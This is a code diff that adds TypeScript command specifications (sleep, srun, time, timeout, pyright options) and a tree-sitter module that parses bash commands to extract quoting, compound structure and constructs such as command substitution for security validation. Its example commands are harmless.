name: '--level',
|
||||
description: 'Minimum diagnostic level',
|
||||
args: { name: 'LEVEL' },
|
||||
},
|
||||
{
|
||||
name: '--skipunannotated',
|
||||
description: 'Skip type analysis of unannotated functions',
|
||||
},
|
||||
{
|
||||
name: '--warnings',
|
||||
description: 'Use exit code of 1 if warnings are reported',
|
||||
},
|
||||
{
|
||||
name: '--threads',
|
||||
description: 'Use up to N threads to parallelize type checking',
|
||||
args: { name: 'N', isOptional: true },
|
||||
},
|
||||
],
|
||||
args: {
|
||||
name: 'files',
|
||||
description:
|
||||
'Specify files or directories to analyze (overrides config file)',
|
||||
isVariadic: true,
|
||||
isOptional: true,
|
||||
},
|
||||
} satisfies CommandSpec
|
||||
@@ -0,0 +1,13 @@
|
||||
import type { CommandSpec } from '../registry.js'
|
||||
|
||||
const sleep: CommandSpec = {
|
||||
name: 'sleep',
|
||||
description: 'Delay for a specified amount of time',
|
||||
args: {
|
||||
name: 'duration',
|
||||
description: 'Duration to sleep (seconds or with suffix like 5s, 2m, 1h)',
|
||||
isOptional: false,
|
||||
},
|
||||
}
|
||||
|
||||
export default sleep
|
||||
@@ -0,0 +1,31 @@
|
||||
import type { CommandSpec } from '../registry.js'
|
||||
|
||||
const srun: CommandSpec = {
|
||||
name: 'srun',
|
||||
description: 'Run a command on SLURM cluster nodes',
|
||||
options: [
|
||||
{
|
||||
name: ['-n', '--ntasks'],
|
||||
description: 'Number of tasks',
|
||||
args: {
|
||||
name: 'count',
|
||||
description: 'Number of tasks to run',
|
||||
},
|
||||
},
|
||||
{
|
||||
name: ['-N', '--nodes'],
|
||||
description: 'Number of nodes',
|
||||
args: {
|
||||
name: 'count',
|
||||
description: 'Number of nodes to allocate',
|
||||
},
|
||||
},
|
||||
],
|
||||
args: {
|
||||
name: 'command',
|
||||
description: 'Command to run on the cluster',
|
||||
isCommand: true,
|
||||
},
|
||||
}
|
||||
|
||||
export default srun
|
||||
@@ -0,0 +1,13 @@
|
||||
import type { CommandSpec } from '../registry.js'
|
||||
|
||||
const time: CommandSpec = {
|
||||
name: 'time',
|
||||
description: 'Time a command',
|
||||
args: {
|
||||
name: 'command',
|
||||
description: 'Command to time',
|
||||
isCommand: true,
|
||||
},
|
||||
}
|
||||
|
||||
export default time
|
||||
@@ -0,0 +1,20 @@
|
||||
import type { CommandSpec } from '../registry.js'
|
||||
|
||||
const timeout: CommandSpec = {
|
||||
name: 'timeout',
|
||||
description: 'Run a command with a time limit',
|
||||
args: [
|
||||
{
|
||||
name: 'duration',
|
||||
description: 'Duration to wait before timing out (e.g., 10, 5s, 2m)',
|
||||
isOptional: false,
|
||||
},
|
||||
{
|
||||
name: 'command',
|
||||
description: 'Command to run',
|
||||
isCommand: true,
|
||||
},
|
||||
],
|
||||
}
|
||||
|
||||
export default timeout
|
||||
@@ -0,0 +1,506 @@
|
||||
/**
|
||||
* Tree-sitter AST analysis utilities for bash command security validation.
|
||||
*
|
||||
* These functions extract security-relevant information from tree-sitter
|
||||
* parse trees, providing more accurate analysis than regex/shell-quote
|
||||
* parsing. Each function takes a root node and command string, and returns
|
||||
* structured data that can be used by security validators.
|
||||
*
|
||||
* The native NAPI parser returns plain JS objects — no cleanup needed.
|
||||
*/
|
||||
|
||||
type TreeSitterNode = {
|
||||
type: string
|
||||
text: string
|
||||
startIndex: number
|
||||
endIndex: number
|
||||
children: TreeSitterNode[]
|
||||
childCount: number
|
||||
}
|
||||
|
||||
export type QuoteContext = {
|
||||
/** Command text with single-quoted content removed (double-quoted content preserved) */
|
||||
withDoubleQuotes: string
|
||||
/** Command text with all quoted content removed */
|
||||
fullyUnquoted: string
|
||||
/** Like fullyUnquoted but preserves quote characters (', ") */
|
||||
unquotedKeepQuoteChars: string
|
||||
}
|
||||
|
||||
export type CompoundStructure = {
|
||||
/** Whether the command has compound operators (&&, ||, ;) at the top level */
|
||||
hasCompoundOperators: boolean
|
||||
/** Whether the command has pipelines */
|
||||
hasPipeline: boolean
|
||||
/** Whether the command has subshells */
|
||||
hasSubshell: boolean
|
||||
/** Whether the command has command groups ({...}) */
|
||||
hasCommandGroup: boolean
|
||||
/** Top-level compound operator types found */
|
||||
operators: string[]
|
||||
/** Individual command segments split by compound operators */
|
||||
segments: string[]
|
||||
}
|
||||
|
||||
export type DangerousPatterns = {
|
||||
/** Has $() or backtick command substitution (outside quotes that would make it safe) */
|
||||
hasCommandSubstitution: boolean
|
||||
/** Has <() or >() process substitution */
|
||||
hasProcessSubstitution: boolean
|
||||
/** Has ${...} parameter expansion */
|
||||
hasParameterExpansion: boolean
|
||||
/** Has heredoc */
|
||||
hasHeredoc: boolean
|
||||
/** Has comment */
|
||||
hasComment: boolean
|
||||
}
|
||||
|
||||
export type TreeSitterAnalysis = {
|
||||
quoteContext: QuoteContext
|
||||
compoundStructure: CompoundStructure
|
||||
/** Whether actual operator nodes (;, &&, ||) exist — if false, \; is just a word argument */
|
||||
hasActualOperatorNodes: boolean
|
||||
dangerousPatterns: DangerousPatterns
|
||||
}
|
||||
|
||||
type QuoteSpans = {
|
||||
raw: Array<[number, number]> // raw_string (single-quoted)
|
||||
ansiC: Array<[number, number]> // ansi_c_string ($'...')
|
||||
double: Array<[number, number]> // string (double-quoted)
|
||||
heredoc: Array<[number, number]> // quoted heredoc_redirect
|
||||
}
|
||||
|
||||
/**
|
||||
* Single-pass collection of all quote-related spans.
|
||||
* Previously this was 5 separate tree walks (one per type-set plus
|
||||
* allQuoteTypes plus heredoc); fusing cuts tree-traversal ~5x.
|
||||
*
|
||||
* Replicates the per-type walk semantics: each original walk stopped at
|
||||
* its own type. So the raw_string walk would recurse THROUGH a string
|
||||
* node (not its type) to reach nested raw_string inside $(...), but the
|
||||
* string walk would stop at the outer string. We track `inDouble` to
|
||||
* collect the *outermost* string span per path, while still descending
|
||||
* into $()/${} bodies to pick up inner raw_string/ansi_c_string.
|
||||
*
|
||||
* raw_string / ansi_c_string / quoted-heredoc bodies are literal text
|
||||
* in bash (no expansion), so no nested quote nodes exist — return early.
|
||||
*/
|
||||
function collectQuoteSpans(
|
||||
node: TreeSitterNode,
|
||||
out: QuoteSpans,
|
||||
inDouble: boolean,
|
||||
): void {
|
||||
switch (node.type) {
|
||||
case 'raw_string':
|
||||
out.raw.push([node.startIndex, node.endIndex])
|
||||
return // literal body, no nested quotes possible
|
||||
case 'ansi_c_string':
|
||||
out.ansiC.push([node.startIndex, node.endIndex])
|
||||
return // literal body
|
||||
case 'string':
|
||||
// Only collect the outermost string (matches old per-type walk
|
||||
// which stops at first match). Recurse regardless — a nested
|
||||
// $(cmd 'x') inside "..." has a real inner raw_string.
|
||||
if (!inDouble) out.double.push([node.startIndex, node.endIndex])
|
||||
for (const child of node.children) {
|
||||
if (child) collectQuoteSpans(child, out, true)
|
||||
}
|
||||
return
|
||||
case 'heredoc_redirect': {
|
||||
// Quoted heredocs (<<'EOF', <<"EOF", <<\EOF): literal body.
|
||||
// Unquoted (<<EOF) expands $()/${} — the body can contain
|
||||
// $(cmd 'x') whose inner '...' IS a real raw_string node.
|
||||
// Detection: heredoc_start text starts with '/"/\\
|
||||
// Matches sync path's extractHeredocs({ quotedOnly: true }).
|
||||
let isQuoted = false
|
||||
for (const child of node.children) {
|
||||
if (child && child.type === 'heredoc_start') {
|
||||
const first = child.text[0]
|
||||
isQuoted = first === "'" || first === '"' || first === '\\'
|
||||
break
|
||||
}
|
||||
}
|
||||
if (isQuoted) {
|
||||
out.heredoc.push([node.startIndex, node.endIndex])
|
||||
return // literal body, no nested quote nodes
|
||||
}
|
||||
// Unquoted: recurse into heredoc_body → command_substitution →
|
||||
// inner quote nodes. The original per-type walks did NOT stop at
|
||||
// heredoc_redirect (not in their type sets), so they recursed here.
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
for (const child of node.children) {
|
||||
if (child) collectQuoteSpans(child, out, inDouble)
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Builds a Set of all character positions covered by the given spans.
|
||||
*/
|
||||
function buildPositionSet(spans: Array<[number, number]>): Set<number> {
|
||||
const set = new Set<number>()
|
||||
for (const [start, end] of spans) {
|
||||
for (let i = start; i < end; i++) {
|
||||
set.add(i)
|
||||
}
|
||||
}
|
||||
return set
|
||||
}
|
||||
|
||||
/**
|
||||
* Drops spans that are fully contained within another span, keeping only the
|
||||
* outermost. Nested quotes (e.g., `"$(echo 'hi')"`) yield overlapping spans
|
||||
* — the inner raw_string is found by recursing into the outer string node.
|
||||
* Processing overlapping spans corrupts indices since removing/replacing the
|
||||
* outer span shifts the inner span's start/end into stale positions.
|
||||
*/
|
||||
function dropContainedSpans<T extends readonly [number, number, ...unknown[]]>(
|
||||
spans: T[],
|
||||
): T[] {
|
||||
return spans.filter(
|
||||
(s, i) =>
|
||||
!spans.some(
|
||||
(other, j) =>
|
||||
j !== i &&
|
||||
other[0] <= s[0] &&
|
||||
other[1] >= s[1] &&
|
||||
(other[0] < s[0] || other[1] > s[1]),
|
||||
),
|
||||
)
|
||||
}
|
||||
|
||||
/**
|
||||
* Removes spans from a string, returning the string with those character
|
||||
* ranges removed.
|
||||
*/
|
||||
function removeSpans(command: string, spans: Array<[number, number]>): string {
|
||||
if (spans.length === 0) return command
|
||||
|
||||
// Drop inner spans that are fully contained in an outer one, then sort by
|
||||
// start index descending so we can splice without offset shifts.
|
||||
const sorted = dropContainedSpans(spans).sort((a, b) => b[0] - a[0])
|
||||
let result = command
|
||||
for (const [start, end] of sorted) {
|
||||
result = result.slice(0, start) + result.slice(end)
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
/**
|
||||
* Replaces spans with just the quote delimiters (preserving ' and " characters).
|
||||
*/
|
||||
function replaceSpansKeepQuotes(
|
||||
command: string,
|
||||
spans: Array<[number, number, string, string]>,
|
||||
): string {
|
||||
if (spans.length === 0) return command
|
||||
|
||||
const sorted = dropContainedSpans(spans).sort((a, b) => b[0] - a[0])
|
||||
let result = command
|
||||
for (const [start, end, open, close] of sorted) {
|
||||
// Replace content but keep the quote delimiters
|
||||
result = result.slice(0, start) + open + close + result.slice(end)
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
/**
|
||||
* Extract quote context from the tree-sitter AST.
|
||||
* Replaces the manual character-by-character extractQuotedContent() function.
|
||||
*
|
||||
* Tree-sitter node types:
|
||||
* - raw_string: single-quoted ('...')
|
||||
* - string: double-quoted ("...")
|
||||
* - ansi_c_string: ANSI-C quoting ($'...') — span includes the leading $
|
||||
* - heredoc_redirect: QUOTED heredocs only (<<'EOF', <<"EOF", <<\EOF) —
|
||||
* the full redirect span (<<, delimiters, body, newlines) is stripped
|
||||
* since the body is literal text in bash (no expansion). UNQUOTED
|
||||
* heredocs (<<EOF) are left in place since bash expands $(...)/${...}
|
||||
* inside them, and validators need to see those patterns. Matches the
|
||||
* sync path's extractHeredocs({ quotedOnly: true }).
|
||||
*/
|
||||
export function extractQuoteContext(
|
||||
rootNode: unknown,
|
||||
command: string,
|
||||
): QuoteContext {
|
||||
// Single walk collects all quote span types at once.
|
||||
const spans: QuoteSpans = { raw: [], ansiC: [], double: [], heredoc: [] }
|
||||
collectQuoteSpans(rootNode as TreeSitterNode, spans, false)
|
||||
const singleQuoteSpans = spans.raw
|
||||
const ansiCSpans = spans.ansiC
|
||||
const doubleQuoteSpans = spans.double
|
||||
const quotedHeredocSpans = spans.heredoc
|
||||
const allQuoteSpans = [
|
||||
...singleQuoteSpans,
|
||||
...ansiCSpans,
|
||||
...doubleQuoteSpans,
|
||||
...quotedHeredocSpans,
|
||||
]
|
||||
|
||||
// Build a set of positions that should be excluded for each output variant.
|
||||
// For withDoubleQuotes: remove single-quoted spans entirely, plus the
|
||||
// opening/closing `"` delimiters of double-quoted spans (but keep the
|
||||
// content between them). This matches the regex extractQuotedContent()
|
||||
// semantics where `"` toggles quote state but content is still emitted.
|
||||
const singleQuoteSet = buildPositionSet([
|
||||
...singleQuoteSpans,
|
||||
...ansiCSpans,
|
||||
...quotedHeredocSpans,
|
||||
])
|
||||
const doubleQuoteDelimSet = new Set<number>()
|
||||
for (const [start, end] of doubleQuoteSpans) {
|
||||
doubleQuoteDelimSet.add(start) // opening "
|
||||
doubleQuoteDelimSet.add(end - 1) // closing "
|
||||
}
|
||||
let withDoubleQuotes = ''
|
||||
for (let i = 0; i < command.length; i++) {
|
||||
if (singleQuoteSet.has(i)) continue
|
||||
if (doubleQuoteDelimSet.has(i)) continue
|
||||
withDoubleQuotes += command[i]
|
||||
}
|
||||
|
||||
// fullyUnquoted: remove all quoted content
|
||||
const fullyUnquoted = removeSpans(command, allQuoteSpans)
|
||||
|
||||
// unquotedKeepQuoteChars: remove content but keep delimiter chars
|
||||
const spansWithQuoteChars: Array<[number, number, string, string]> = []
|
||||
for (const [start, end] of singleQuoteSpans) {
|
||||
spansWithQuoteChars.push([start, end, "'", "'"])
|
||||
}
|
||||
for (const [start, end] of ansiCSpans) {
|
||||
// ansi_c_string spans include the leading $; preserve it so this
|
||||
// matches the regex path, which treats $ as unquoted preceding '.
|
||||
spansWithQuoteChars.push([start, end, "$'", "'"])
|
||||
}
|
||||
for (const [start, end] of doubleQuoteSpans) {
|
||||
spansWithQuoteChars.push([start, end, '"', '"'])
|
||||
}
|
||||
for (const [start, end] of quotedHeredocSpans) {
|
||||
// Heredoc redirect spans have no inline quote delimiters — strip entirely.
|
||||
spansWithQuoteChars.push([start, end, '', ''])
|
||||
}
|
||||
const unquotedKeepQuoteChars = replaceSpansKeepQuotes(
|
||||
command,
|
||||
spansWithQuoteChars,
|
||||
)
|
||||
|
||||
return { withDoubleQuotes, fullyUnquoted, unquotedKeepQuoteChars }
|
||||
}
|
||||
|
||||
/**
|
||||
* Extract compound command structure from the AST.
|
||||
* Replaces isUnsafeCompoundCommand() and splitCommand() for tree-sitter path.
|
||||
*/
|
||||
export function extractCompoundStructure(
|
||||
rootNode: unknown,
|
||||
command: string,
|
||||
): CompoundStructure {
|
||||
const n = rootNode as TreeSitterNode
|
||||
const operators: string[] = []
|
||||
const segments: string[] = []
|
||||
let hasSubshell = false
|
||||
let hasCommandGroup = false
|
||||
let hasPipeline = false
|
||||
|
||||
// Walk top-level children of the program node
|
||||
function walkTopLevel(node: TreeSitterNode): void {
|
||||
for (const child of node.children) {
|
||||
if (!child) continue
|
||||
|
||||
if (child.type === 'list') {
|
||||
// list nodes contain && and || operators
|
||||
for (const listChild of child.children) {
|
||||
if (!listChild) continue
|
||||
if (listChild.type === '&&' || listChild.type === '||') {
|
||||
operators.push(listChild.type)
|
||||
} else if (
|
||||
listChild.type === 'list' ||
|
||||
listChild.type === 'redirected_statement'
|
||||
) {
|
||||
// Nested list, or redirected_statement wrapping a list/pipeline —
|
||||
// recurse so inner operators/pipelines are detected. For
|
||||
// `cmd1 && cmd2 2>/dev/null && cmd3`, the redirected_statement
|
||||
// wraps `list(cmd1 && cmd2)` — the inner `&&` would be missed
|
||||
// without recursion.
|
||||
walkTopLevel({ ...node, children: [listChild] } as TreeSitterNode)
|
||||
} else if (listChild.type === 'pipeline') {
|
||||
hasPipeline = true
|
||||
segments.push(listChild.text)
|
||||
} else if (listChild.type === 'subshell') {
|
||||
hasSubshell = true
|
||||
segments.push(listChild.text)
|
||||
} else if (listChild.type === 'compound_statement') {
|
||||
hasCommandGroup = true
|
||||
segments.push(listChild.text)
|
||||
} else {
|
||||
segments.push(listChild.text)
|
||||
}
|
||||
}
|
||||
} else if (child.type === ';') {
|
||||
operators.push(';')
|
||||
} else if (child.type === 'pipeline') {
|
||||
hasPipeline = true
|
||||
segments.push(child.text)
|
||||
} else if (child.type === 'subshell') {
|
||||
hasSubshell = true
|
||||
segments.push(child.text)
|
||||
} else if (child.type === 'compound_statement') {
|
||||
hasCommandGroup = true
|
||||
segments.push(child.text)
|
||||
} else if (
|
||||
child.type === 'command' ||
|
||||
child.type === 'declaration_command' ||
|
||||
child.type === 'variable_assignment'
|
||||
) {
|
||||
segments.push(child.text)
|
||||
} else if (child.type === 'redirected_statement') {
|
||||
// `cd ~/src && find path 2>/dev/null` — tree-sitter wraps the ENTIRE
|
||||
// compound in a redirected_statement: program → redirected_statement →
|
||||
// (list → cmd1, &&, cmd2) + file_redirect. Same for `cmd1 | cmd2 > out`
|
||||
// (wraps pipeline) and `(cmd) > out` (wraps subshell). Recurse to
|
||||
// detect the inner structure; skip file_redirect children (redirects
|
||||
// don't affect compound/pipeline classification).
|
||||
let foundInner = false
|
||||
for (const inner of child.children) {
|
||||
if (!inner || inner.type === 'file_redirect') continue
|
||||
foundInner = true
|
||||
walkTopLevel({ ...child, children: [inner] } as TreeSitterNode)
|
||||
}
|
||||
if (!foundInner) {
|
||||
// Standalone redirect with no body (shouldn't happen, but fail-safe)
|
||||
segments.push(child.text)
|
||||
}
|
||||
} else if (child.type === 'negated_command') {
|
||||
// `! cmd` — recurse into the inner command so its structure is
|
||||
// classified (pipeline/subshell/etc.), but also record the full
|
||||
// negated text as a segment so segments.length stays meaningful.
|
||||
segments.push(child.text)
|
||||
walkTopLevel(child)
|
||||
} else if (
|
||||
child.type === 'if_statement' ||
|
||||
child.type === 'while_statement' ||
|
||||
child.type === 'for_statement' ||
|
||||
child.type === 'case_statement' ||
|
||||
child.type === 'function_definition'
|
||||
) {
|
||||
// Control-flow constructs: the construct itself is one segment,
|
||||
// but recurse so inner pipelines/subshells/operators are detected.
|
||||
segments.push(child.text)
|
||||
walkTopLevel(child)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
walkTopLevel(n)
|
||||
|
||||
// If no segments found, the whole command is one segment
|
||||
if (segments.length === 0) {
|
||||
segments.push(command)
|
||||
}
|
||||
|
||||
return {
|
||||
hasCompoundOperators: operators.length > 0,
|
||||
hasPipeline,
|
||||
hasSubshell,
|
||||
hasCommandGroup,
|
||||
operators,
|
||||
segments,
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Check whether the AST contains actual operator nodes (;, &&, ||).
|
||||
*
|
||||
* This is the key function for eliminating the `find -exec \;` false positive.
|
||||
* Tree-sitter parses `\;` as part of a `word` node (an argument to find),
|
||||
* NOT as a `;` operator. So if no actual `;` operator nodes exist in the AST,
|
||||
* there are no compound operators and hasBackslashEscapedOperator() can be skipped.
|
||||
*/
|
||||
export function hasActualOperatorNodes(rootNode: unknown): boolean {
|
||||
const n = rootNode as TreeSitterNode
|
||||
|
||||
function walk(node: TreeSitterNode): boolean {
|
||||
// Check for operator types that indicate compound commands
|
||||
if (node.type === ';' || node.type === '&&' || node.type === '||') {
|
||||
// Verify this is a child of a list or program, not inside a command
|
||||
return true
|
||||
}
|
||||
|
||||
if (node.type === 'list') {
|
||||
// A list node means there are compound operators
|
||||
return true
|
||||
}
|
||||
|
||||
for (const child of node.children) {
|
||||
if (child && walk(child)) return true
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
return walk(n)
|
||||
}
|
||||
|
||||
/**
|
||||
* Extract dangerous pattern information from the AST.
|
||||
*/
|
||||
export function extractDangerousPatterns(rootNode: unknown): DangerousPatterns {
|
||||
const n = rootNode as TreeSitterNode
|
||||
let hasCommandSubstitution = false
|
||||
let hasProcessSubstitution = false
|
||||
let hasParameterExpansion = false
|
||||
let hasHeredoc = false
|
||||
let hasComment = false
|
||||
|
||||
function walk(node: TreeSitterNode): void {
|
||||
switch (node.type) {
|
||||
case 'command_substitution':
|
||||
hasCommandSubstitution = true
|
||||
break
|
||||
case 'process_substitution':
|
||||
hasProcessSubstitution = true
|
||||
break
|
||||
case 'expansion':
|
||||
hasParameterExpansion = true
|
||||
break
|
||||
case 'heredoc_redirect':
|
||||
hasHeredoc = true
|
||||
break
|
||||
case 'comment':
|
||||
hasComment = true
|
||||
break
|
||||
}
|
||||
|
||||
for (const child of node.children) {
|
||||
if (child) walk(child)
|
||||
}
|
||||
}
|
||||
|
||||
walk(n)
|
||||
|
||||
return {
|
||||
hasCommandSubstitution,
|
||||
hasProcessSubstitution,
|
||||
hasParameterExpansion,
|
||||
hasHeredoc,
|
||||
hasComment,
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Perform complete tree-sitter analysis of a command.
|
||||
* Extracts all security-relevant data from the AST in one pass.
|
||||
* This data must be extracted before tree.delete() is called.
|
||||
*/
|
||||
export function analyzeCommand(
|
||||
rootNode: unknown,
|
||||
command: string,
|
||||
): TreeSitterAnalysis {
|
||||
return {
|
||||
quoteContext: extractQuoteContext(rootNode, command),
|
||||
compoundStructure: extractCompoundStructure(rootNode, command),
|
||||
hasActualOperatorNodes: hasActualOperatorNodes(rootNode),
|
||||
dangerousPatterns: extractDangerousPatterns(rootNode),
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user